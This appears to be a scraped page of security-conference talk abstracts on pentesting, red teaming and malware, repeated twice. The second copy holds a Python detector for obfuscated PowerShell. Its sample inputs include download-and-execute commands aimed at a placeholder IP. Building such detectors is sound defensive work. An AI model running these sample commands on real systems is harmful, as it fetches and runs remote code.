Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools and modify existing tools on the fly is critically important to agility during a testing engagement. Everything from utility processing of data, network protocols, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao - Shakacon
Since 2014, fifteen new malware or riskware families have successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affecting thousands of iOS apps and tens of millions of users around the world. Ten of them even bypassed Apple’s code vetting and appeared in the App Store. In this presentation, we will systematically study how these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches, including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attacks, abusing MDM solutions, abusing private APIs, exploiting design flaws or app-level vulnerabilities, and stealing private data. For each topic, we will introduce its implementation, explore real-world cases, analyze its risks and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in the near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences can make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
Red Team Tactics for Cracking the GSuite Perimeter - Mike Felch
As more corporations adopt Google for providing cloud services they are also inheriting the security risks associated with centralized computing, email and data storage outside the perimeter. In order for pentesters and red teamers to remain effective in analyzing security risks, they must adapt techniques in a way that brings value to the customer.
In this presentation we will begin by demonstrating adaptive techniques to crack the perimeter of Google Suite customers. Next, we will show how evasion can be accomplished by hiding in plain sight due to failures in incident response plans. Finally, we will also show how a simple compromise could mean collateral damage for customers who are not carefully monitoring these cloud environments.
This document discusses various techniques for finding and exploiting vulnerabilities during a penetration test when vulnerabilities are marked as "low" or "medium" in severity. It argues that penetration testers and clients should not rely solely on vulnerability scanners and should thoroughly investigate even lower severity issues. Specific techniques mentioned include exploiting default credentials on services like VNC, exploiting exposed admin interfaces found through tools like Metasploit, taking advantage of browsable directories with backups or other sensitive files, exploiting SharePoint misconfigurations, exploiting HTTP PUT or WebDAV configurations, exploiting Apple Filing Protocol, and exploiting trace.axd to view request details in .NET applications. The document emphasizes finding overlooked vulnerabilities and keeping "a human in the mix" rather than full reliance
hackcon2013 - Dirty Little Secrets They Didn't Teach You In Pentesting Class v2 - Chris Gates
This document discusses 10 different ways to execute code remotely on Windows systems, including native Windows tools like Sysinternals PSExec, methods in Metasploit like PSExec and PSExec-MOF, and other techniques like WMI, PowerShell, and RemCom. Each method is briefly outlined with its positives and negatives. For example, PSExec leaves the PSEXESVC service running but never needs updating, while Metasploit PSExec supports pass-the-hash but some antiviruses may flag the service binary. The document provides an overview of common remote code execution options for pentesters and their relative tradeoffs.
Defeating Firefox by Muneaki Nishimunea - CODE BLUE 2015 - CODE BLUE
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox have a trend; however, awareness of the trend has not been raised among the Firefox developers, and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but to any other open source software, as it is based on an issue particular to open source software.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ... - CODE BLUE
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
TeelTech - Advancing Mobile Device Forensics (online version) - Mike Felch
This document provides an overview of a training on advancing mobile device forensics through reverse engineering and programming techniques. It discusses how traditional forensic tools are becoming less effective at recovering data from newer devices and applications that are designed for privacy. The training will demonstrate extracting artifacts from a raw device image using a hex editor and Python scripts. It also outlines a simulated criminal investigation involving the murder of a victim, and how analyzing the digital evidence from the victim's and suspect's mobile phones through these new techniques revealed deleted messages that are relevant to the case.
This presentation discusses how access keys can leak from cloud services like AWS, Azure, and GCP. It outlines several ways keys may leak, such as from unsecured storage containers, compromised accounts, and web applications. The presentation then demonstrates a tool called DumpsterDiver that uses entropy analysis to hunt for private keys within files. Countermeasures discussed include access control, encryption, VPN access only, multi-factor authentication, regular data verification, and penetration testing. The goal is to show how keys can leak and discuss reliable prevention strategies.
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To... - CODE BLUE
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
--- Daniel Bohannon
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breaches occur. He also develops new methods for detecting malicious PowerShell usage at both the host and network level while researching obfuscation techniques for PowerShell-based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
Adversarial Post-Ex: Lessons From The Pros - Justin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This presentation by Christopher Grayson covers some lessons learned as a security professional who has made his way into software engineering full time.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland - CODE BLUE
In June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating the legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims' Facebook and Google Drive accounts. After puzzling over the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explain how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israel-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st place at HackTrackTLV 2016 and eBay Hackathon 2015.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015 - CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, it certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude by deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent, making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include E-Mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete.
Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in Windows environments.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
Pentest Apocalypse - That's when you hire a pentester, and they walk all over your network. To avoid this, organizations need to be prepared before the first packet is sent in order to get the most value from the tester. There is no excuse for pentesters to find critical vulnerabilities that are six years old on an assessment. And who needs a zero-day when employees leave credentials on wide-open shares? Just like how Doomsday Preppers helps you prepare for the apocalypse, this presentation will help you prepare for, and avoid, a pentest apocalypse by describing common vulnerabilities found on many assessments. Being prepared for common pentester activities will not only help add value to a pentest but will also help prevent attackers from using the same tactics to compromise your organization.
For More Information Please Visit: http://bsidestampa.net
http://www.irongeek.com/i.php?page=videos/bsidestampa2015/104-pentest-apocalypse-beau-bullock
Andrew Morris collected malware samples over the weekend using Dionaea and JBoss honeypots. The Dionaea honeypot captured over 100 Conficker malware samples exploiting Windows SMB vulnerabilities. The JBoss honeypot was infected by the ZECMD worm within 24 hours, exploiting exposed JMX consoles. Both provided real-world malware samples for analysis without risking other systems on Morris' network. He offered to collaborate on further manual analysis of the samples.
PENETRATION TESTING FROM A HOT TUB TIME MACHINE - Chris Gates
This presentation discusses penetration testing techniques from an unconventional perspective. It advocates for intelligence gathering and footprinting before scanning or exploitation to have a more effective assessment. Specific techniques discussed include using open source intelligence gathering on internal and external systems to develop profiles and target lists. Footprinting activities within the network focus on enumeration of users, shares, services and other details to identify vulnerable systems rather than broad scanning. The presentation provides examples of exploiting old vulnerabilities in applications like Citrix and weaknesses in administration interfaces. It emphasizes continuing post-exploitation activities like privilege escalation and lateral movement within compromised systems to fully evaluate security.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, and security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and HackerNews, setting up test environments, and optimizing hunting strategies based on collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Dirty Little Secrets They Didn't Teach You In Pentest Class v2 - Rob Fuller
This talk (hopefully) provides some new pentester tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include: OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using Metasploit.
The last few years have seen a dramatic increase in the number of PowerShell-based penetration testing tools. A benefit of tools written in PowerShell is that it is installed by default on every Windows system. This allows us as attackers to “live off the land”. It also has built-in functionality to run in memory, bypassing most security products.
I will walk through various methodologies I use surrounding popular PowerShell tools. Details on attacking an organization remotely, establishing command and control, and escalating privileges within an environment all with PowerShell will be discussed. You say you’ve blocked PowerShell? Techniques for running PowerShell in locked down environments that block PowerShell will be highlighted as well.
TABLETOP SCENARIO: Your organization regularly patches, uses application whitelisting, has NextGen-NG™ firewalls/IDS’s, and has the latest Cyber-APT-Trapping-Blinky-Box™. You were just made aware that your entire customer database was found being sold on the dark web. Go.
Putting too much trust in security products alone can be the downfall of an organization. In the 2015 BSides Tampa talk “Pentest Apocalypse” Beau discussed 10 different pentesting techniques that allow attackers to easily compromise an organization. These techniques still work for many organizations but occasionally more advanced tactics and techniques are required. This talk will continue where “Pentest Apocalypse” left off and demonstrate a number of red team techniques that organizations need to be aware of in order to prevent a “Red Team Apocalypse” as described in the tabletop scenario above.
The document provides a summary of the top 10 threats to cloud security as presented by James Condon from Lacework. The top threats are: 1) publicly accessible resources, 2) leaked keys, 3) malicious insiders, 4) brute force attacks, 5) remote code execution, 6) container escapes, 7) supply chain attacks, 8) malware, 9) cryptojacking, and 10) ransomware. For each threat, examples are given and mitigations are proposed. The document concludes by introducing Lacework's unified cloud security platform.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
This document provides an overview of a training on advancing mobile device forensics through reverse engineering and programming techniques. It discusses how traditional forensic tools are becoming less effective at recovering data from newer devices and applications that are designed for privacy. The training will demonstrate extracting artifacts from a raw device image using a hex editor and Python scripts. It also outlines a simulated criminal investigation involving the murder of a victim, and how analyzing the digital evidence from the victim and suspect's mobile phones through these new techniques revealed deleted messages that are relevant to the case.
This presentation discusses how access keys can leak from cloud services like AWS, Azure, and GCP. It outlines several ways keys may leak, such as from unsecured storage containers, compromised accounts, and web applications. The presentation then demonstrates a tool called DumpsterDiver that uses entropy analysis to hunt for private keys within files. Countermeasures discussed include access control, encryption, VPN access only, multi-factor authentication, regular data verification, and penetration testing. The goal is to show how keys can leak and discuss reliable prevention strategies.
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
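The command-line-only detection the abstract refers to can be prototyped as a scorer over process creation events. The following is an added example, not Invoke-Obfuscation or Mandiant code: it runs a handful of publicly known obfuscation indicators over constructed powershell.exe/cmd.exe command lines (backticks splitting identifiers, string concatenation, the -f format operator, [char] casts, -EncodedCommand and its abbreviations, cmd.exe carets, wildcard alias lookups, and random casing measured as the rate of upper/lower flips in a word). The indicator list, thresholds and sample command lines are assumptions for the demo, not the talk's own techniques; the encoded sample is built at runtime from a harmless inner command so the base64 is genuine UTF-16LE.

```python
import base64
import re

# Constructed command lines for the demo; none are captured from a real incident.
_ENCODED = base64.b64encode("Get-Date".encode("utf-16le")).decode()
SAMPLES = [
    # 0: routine administration, should score 0
    "powershell.exe -NoProfile -Command \"Get-Service | Where-Object {$_.Status -eq 'Running'}\"",
    # 1: backticks splitting cmdlet and method names
    "powershell.exe -c \"(Ne`w-Ob`ject Net.WebClient).Down`loadString('http://203.0.113.10/a')|I`EX\"",
    # 2: string concatenation plus random casing of a method name
    "powershell.exe -c \"$m='dOwN'+'lOaD'+'sTrInG';iEx (New-Object Net.WebClient).$m('http://203.0.113.10/a')\"",
    # 3: -EncodedCommand via its common abbreviation
    f"powershell.exe -NoP -NonI -W Hidden -Enc {_ENCODED}",
    # 4: format operator and [char] casts assembling 'IEX' and 'Get-Date'
    "powershell.exe -c \"&([string]::Join('',[char]73,[char]69,[char]88)) ('{1}{0}' -f 'et-Date','G')\"",
    # 5: cmd.exe caret escapes and a wildcard alias lookup resolving to iex
    "cmd.exe /c \"p^o^w^e^r^s^h^e^l^l -c &(GAL I*X) 'Get-Date'\"",
]

# -e, -ec, -en, -enc and the full switch are all accepted by powershell.exe.
ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
TICK_RE = re.compile(r"[A-Za-z]`[A-Za-z]")          # tick between two letters
CONCAT_RE = re.compile(r"['\"]\s*\+\s*['\"]")        # 'a'+'b'
FORMAT_RE = re.compile(r"\{\d+\}[^|;]*-f\s", re.I)  # '{1}{0}' -f ...
CHAR_RE = re.compile(r"\[char\]", re.I)
CARET_RE = re.compile(r"\^")
REVERSE_RE = re.compile(r"\[\s*-1\s*\.\.\s*-")      # $s[-1..-N] string reversal
ALIAS_RE = re.compile(r"\b(?:gal|get-alias|gcm|get-command)\s+[\w*?-]*[*?]", re.I)
WORD_RE = re.compile(r"[A-Za-z]+")


def _random_casing(text: str) -> bool:
    """True if any word of 6+ letters flips case at half or more of its letter boundaries."""
    for word in WORD_RE.findall(text):
        if len(word) < 6:
            continue
        flips = sum(1 for a, b in zip(word, word[1:]) if a.isupper() != b.isupper())
        if flips / (len(word) - 1) >= 0.5:
            return True
    return False


def analyze(cmdline: str) -> list:
    """Return the names of the obfuscation indicators present in one command line."""
    hits = []
    if ENC_RE.search(cmdline):
        hits.append("encoded_command")
        cmdline = ENC_RE.sub(" ", cmdline)  # keep the base64 blob out of the casing check
    if len(TICK_RE.findall(cmdline)) >= 2:
        hits.append("backtick_in_identifiers")
    if len(CONCAT_RE.findall(cmdline)) >= 2:
        hits.append("string_concatenation")
    if FORMAT_RE.search(cmdline):
        hits.append("format_operator")
    if len(CHAR_RE.findall(cmdline)) >= 3:
        hits.append("char_casts")
    if len(CARET_RE.findall(cmdline)) >= 3:
        hits.append("caret_escapes")
    if REVERSE_RE.search(cmdline):
        hits.append("reversed_string")
    if ALIAS_RE.search(cmdline):
        hits.append("alias_wildcard_lookup")
    if _random_casing(cmdline):
        hits.append("random_casing")
    return hits


def triage(cmdlines) -> list:
    """Return (cmdline, indicators) for every command line that trips at least one check."""
    out = []
    for c in cmdlines:
        hits = analyze(c)
        if hits:
            out.append((c, hits))
    return out


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLES):
        print(", ".join(hits), "<-", cmd[:70])
```

A scorer like this only sees what was passed on the command line; a payload fetched and run in memory leaves no trace here, which is why the abstract's point about enabling script block and module logging stands regardless of how good the command-line rules get.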
--- Daniel Bohannon
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breaches occur. He also develops new methods for detecting malicious PowerShell usage at both the host and network level while researching obfuscation techniques for PowerShell-based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
Adversarial Post-Ex: Lessons From The Pros - Justin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This presentation by Christopher Grayson covers some lessons learned as a security professional who has moved into software engineering full time.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland - CODE BLUE
In June, thousands of Facebook users complained that they had been infected by a virus through their accounts after receiving a message from a Facebook friend claiming they had been mentioned in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO and founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage started when the user clicked on the “mention”: a malicious file seized control of the browser, terminating its legitimate session and replacing it with a malicious one that captured the user's entire web traffic. The second stage was a highly sophisticated script that took over the victims' Facebook and Google Drive accounts. After piecing the script together, they managed to extract the proverbial needle from the haystack: an unknown Facebook vulnerability that allowed an attacker to abuse the notifications functionality.
In this talk, Dani and Ido will dive into the bits and bytes of the campaign and explain how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israel-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in hackathons (programming competitions) and won first place at HackTrackTLV 2016 and the eBay Hackathon 2015.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, it certainly counts as one of the bolder ones a JavaScript web framework could ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or the lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: have they successfully kept evil minds like yours truly from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude by deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean enhancement.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent, making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include e-mail and password scraping, OWA/EWS brute-forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client-side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete.
Security Consultant at Silent Break Security. Professional hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in Windows environments.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
Pentest Apocalypse: that's when you hire a pentester, and they walk all over your network. To avoid this, organizations need to be prepared before the first packet is sent in order to get the most value from the tester. There is no excuse for pentesters to find critical vulnerabilities that are six years old on an assessment. And who needs a zero-day when employees leave credentials on wide-open shares? Just as Doomsday Preppers helps you prepare for the apocalypse, this presentation will help you prepare for, and avoid, a pentest apocalypse by describing common vulnerabilities found on many assessments. Being prepared for common pentester activities will not only add value to a pentest but will also help prevent attackers from using the same tactics to compromise your organization.
For More Information Please Visit:- http://bsidestampa.net
http://www.irongeek.com/i.php?page=videos/bsidestampa2015/104-pentest-apocalypse-beau-bullock
Andrew Morris collected malware samples over the weekend using Dionaea and JBoss honeypots. The Dionaea honeypot captured over 100 Conficker malware samples exploiting Windows SMB vulnerabilities. The JBoss honeypot was infected by the ZECMD worm within 24 hours, exploiting exposed JMX consoles. Both provided real-world malware samples for analysis without risking other systems on Morris' network. He offered to collaborate on further manual analysis of the samples.
PENETRATION TESTING FROM A HOT TUB TIME MACHINE - Chris Gates
This presentation discusses penetration testing techniques from an unconventional perspective. It advocates for intelligence gathering and footprinting before scanning or exploitation to have a more effective assessment. Specific techniques discussed include using open source intelligence gathering on internal and external systems to develop profiles and target lists. Footprinting activities within the network focus on enumeration of users, shares, services and other details to identify vulnerable systems rather than broad scanning. The presentation provides examples of exploiting old vulnerabilities in applications like Citrix and weaknesses in administration interfaces. It emphasizes continuing post-exploitation activities like privilege escalation and lateral movement within compromised systems to fully evaluate security.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, and security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and Hacker News, setting up test environments, and optimizing hunting strategies based on the collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Dirty Little Secrets They Didn't Teach You In Pentest Class v2 - Rob Fuller
This talk (hopefully) provides some new pentester tools and tricks. Basically a continuation of last year’s Dirty Little Secrets They Didn’t Teach You in Pentest Class. Topics include: OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using Metasploit.
The last few years have seen a dramatic increase in the number of PowerShell-based penetration testing tools. A benefit of tools written in PowerShell is that it is installed by default on every modern Windows system. This allows us as attackers to “live off the land”. It also has built-in functionality to run in memory, bypassing most security products.
I will walk through various methodologies I use surrounding popular PowerShell tools. Details on attacking an organization remotely, establishing command and control, and escalating privileges within an environment all with PowerShell will be discussed. You say you’ve blocked PowerShell? Techniques for running PowerShell in locked down environments that block PowerShell will be highlighted as well.
TABLETOP SCENARIO: Your organization regularly patches, uses application whitelisting, has NextGen-NG™ firewalls/IDS’s, and has the latest Cyber-APT-Trapping-Blinky-Box™. You were just made aware that your entire customer database was found being sold on the dark web. Go.
Putting too much trust in security products alone can be the downfall of an organization. In the 2015 BSides Tampa talk “Pentest Apocalypse” Beau discussed 10 different pentesting techniques that allow attackers to easily compromise an organization. These techniques still work for many organizations but occasionally more advanced tactics and techniques are required. This talk will continue where “Pentest Apocalypse” left off and demonstrate a number of red team techniques that organizations need to be aware of in order to prevent a “Red Team Apocalypse” as described in the tabletop scenario above.
The document provides a summary of the top 10 threats to cloud security as presented by James Condon from Lacework. The top threats are: 1) publicly accessible resources, 2) leaked keys, 3) malicious insiders, 4) brute force attacks, 5) remote code execution, 6) container escapes, 7) supply chain attacks, 8) malware, 9) cryptojacking, and 10) ransomware. For each threat, examples are given and mitigations are proposed. The document concludes by introducing Lacework's unified cloud security platform.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
Dirty Little Secrets They Didn't Teach You In Pentest Class v2 - Chris Gates
